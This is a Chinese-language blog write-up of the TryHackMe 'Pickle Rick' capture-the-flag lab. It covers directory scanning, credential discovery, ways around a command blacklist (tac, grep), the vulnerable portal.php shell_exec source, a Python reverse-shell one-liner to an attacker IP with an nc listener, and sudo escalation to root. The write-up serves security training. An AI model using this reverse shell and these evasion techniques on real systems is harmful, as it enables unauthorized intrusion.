TryHackMe靶机- Pickle Rick

最新推荐文章于 2024-09-15 13:25:26 发布
最新推荐文章于 2024-09-15 13:25:26 发布
阅读量224 收藏 1
点赞数 1
文章标签: bash linux php
J
本文链接:https://blog.csdn.net/Che_ng/article/details/129636137
版权

访问->网址

F12查看源码

在这里插入图片描述

记录下来注释信息,Username: R1ckRul3s可能用的上

直接开扫(扫描目录)

dirsearh -u http://xxxx
-------有用的信息-------------
[11:02:17] 200 -    2KB - /assets/
[11:02:17] 301 -  341B  - /assets  ->  http://10-10-220-36.p.thmlabs.com/assets/
[11:02:40] 200 -    1KB - /index.html
[11:02:45] 200 -  882B  - /login.php
[11:03:05] 200 -   17B  - /robots.txt

访问robots.txt,得到一串字符串,先保留着

Wubbalubbadubdub

访问login.php

使用R1ckRul3s和密码Wubbalubbadubdub登陆,Bingo!!!成功

跳转到portal.php界面

在这里插入图片描述

是命令面板,哇酷哇酷!

试着执行ls

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

cat文件,被ban了==> Command disabled to make it hard for future **PICKLEEEE RICCCKKKK**.

我们不止这一种读取文件的方法,tac可以!

$ tac Sup3rS3cretPickl3Ingred.txt

mr. meeseek hair  //这就是第一题的答案

学到了一个方法:

while read line;do echo $line;done<Sup3rS3cretPickl3Ingred.txt

这是一个 Bash shell 中的命令,它从文件 “file.txt” 中逐行读取内容,并将每一行打印到屏幕上。

更具体地说,这个命令使用了 Bash shell 中的输入重定向操作符 “<”,将文件 “file.txt” 的内容作为标准输入输入到一个 while 循环中。while 循环读取标准输入,每次读取一行,将其保存在变量 $line 中,并执行一个 echo 命令将这一行内容打印到屏幕上。这个循环会一直执行,直到读取完文件中的所有行。

还可以使用grep命令

$grep -R .

grep 是一种用于在文本文件中搜索指定模式的命令行工具。选项 -R 意味着递归地搜索目录树中的所有文件,而 “.” 表示匹配所有内容,即在所有文件中搜索所有文本行。

因此,命令 “grep -R .” 将在当前目录及其子目录下递归搜索所有文件,并输出包含任意文本行的文件名和行内容。这相当于搜索整个目录树,查找任何包含文本内容的文件。

查看页面源码:

portal.php的源码

<?php
  function contains($str, array $arr)
  {
      foreach($arr as $a) {
          if (stripos($str,$a) !== false) return true;
      }
      return false;
  }
  // Cant use cat
  $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
  if(isset($_POST["command"])) {
    if(contains($_POST["command"], $cmds)) {
      echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
  } else {
      $output = shell_exec($_POST["command"]);
      echo "</br><pre>$output</pre>";
    }
  }
?>

简单的代码审计(除了知道被禁了什么,也没啥作用了)

反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.68.63",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在攻击机中监听

$ nc -lvnp 9999

反弹成功

在这里插入图片描述

加固一下shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

现在是不受约束的了,可以cat等操作

/home/rick分析第二题的答案

在这里插入图片描述
查看一下权限sudo -l

-l显示出自己(执行 sudo 的使用者)的权限

在这里插入图片描述

没有密码,直接切换成root用户 sudo su

成功!

/root目录下发现第三问的答案文件,cat一下

$cat 3rd.txt
> fleeb juice
Che_ng
关注
网络攻防靶机-设计概要 V5.docx
09-06
网络攻防靶机-设计概要 V5.docx 网络攻防靶机是指一种可以模拟网络攻击和防御的系统,旨在提高网络安全防御能力。该系统的设计概要包括项目概况、术语与定义、项目来源与参考资料、引用标准和规范、系统总体框架、...
TryHackMe-Pickle_Rick
M1n9K1n9的博客
01-05 208
瑞克和莫蒂的CTF。帮助瑞克变回人类!
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 926
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
TRY HACK ME|Kenobi 「利用Samba+ProFtpd提权」
AKAHRZ的博客
04-02 4159
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Kenobi 「利用Samba+ProFtpd提权」THM靶场:KenobiTASK1 部署机器TASK2 为共享枚举 SambaTASK3 使用 ProFtp.
pickle_Pickle Rick CTF撰写
weixin_26722031的博客
07-30 403
pickleThis writeup documents my approach to solving the “Pickle Rick” Capture The Flag (CTF) room available on the TryHackMe platform for free to members. The TryHackMe platform is an excellent place ...
Tryhackme-Starters
个人博客
11-03 769
Starters 文章目录StartersRickle RickTask1 Pickle RickMr Rebot CTFTask1 Connect to our networkTask2 Hack the machinetomghostTask1 FlagsDogcatTask1 DogcatGit HappensTask1 Capture the FlagNaxTask1 FlagThe MarketplaceTask1 The MarketplacekibaTask1 Flags Rickle
靶机-dvwa修改配置版
05-09
靶机-dvwa修改配置版是一个用于网络安全教育和练习的平台,主要针对Web应用程序的安全漏洞。DVWA(Damn Vulnerable Web Application)是一个开源的Web应用,设计用来帮助安全专业人员测试他们的技能,以及让开发者更...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
靶机-淡然qqyw图标点亮系统
05-09
靶机在IT行业中通常指的是用于安全测试或网络安全教学的模拟系统。这个名为“淡然qqyw图标点亮系统”的靶机,特别提到了“头注入”技术,这可能是指HTTP头部注入攻击,一种常见的Web应用程序安全漏洞。在HTTP头部...
TryHackMe-Gatekeeper
网安星空
12-28 912
TryHackMe靶场,缓冲区溢出,使用Immunity进行溢出测试,
Tryhackme-Kenobi靶机
MSB_WLAQ的博客
10-06 560
前言 一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。 知识点 可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。 samba Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。 Samba基于服务器消息块 (SMB) 的通用客户端/服.
TryHackMe学习笔记-Buffer Overflow Prep
网安星空
12-18 1484
TryHackMe靶场联系,PWN与逆向课程系列,Windows环境下的缓冲区溢出,也是OSCP教程的内容之一
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3751
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
TryHackMe学习笔记-The Cod Caper
网安星空
12-17 1402
TryHackMe靶场,联系SQL注入、命令执行等常见漏洞和基本的缓冲区溢出提权
/bin/bash的作用
qq_43808611的博客
09-11 345
bash
简单说说关于shell中zsh和bash的选择
一捌柒的博客
09-10 898
Shell 是一种命令行界面(CLI),允许用户与操作系统进行交互。和是两种流行的 Unix shell,它们各自提供了强大的功能和灵活性,以满足不同用户的需求和偏好。说的简单一些,就是我们在shell中写一些函数,以及各种脚本代码来实现和操作的系统的交互;
Linux_bash的一些特殊符号
sq2048935747@163.com的博客
09-15 599
这些是内置变量,分别表示最近命令的退出状态、shell 选项、传递给脚本的参数个数、所有参数、所有参数(与。只有在前一个命令成功(返回状态为0)时,才执行后一个命令。只有在前一个命令失败(返回状态非0)时,才执行后一个命令。用于创建子shell,或者在命令中分组执行多个命令。将多个命令放在一行中顺序执行,不管前一个命令是否成功。用于根据前一个命令的执行结果决定是否执行后一个命令。将一个命令的输出传递给另一个命令作为输入。在一行中执行多个命令,命令之间用分号分隔。
Linux bash 关联数组
最新发布
菜鸟记录
09-15 306
Linux bash 关联数组
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值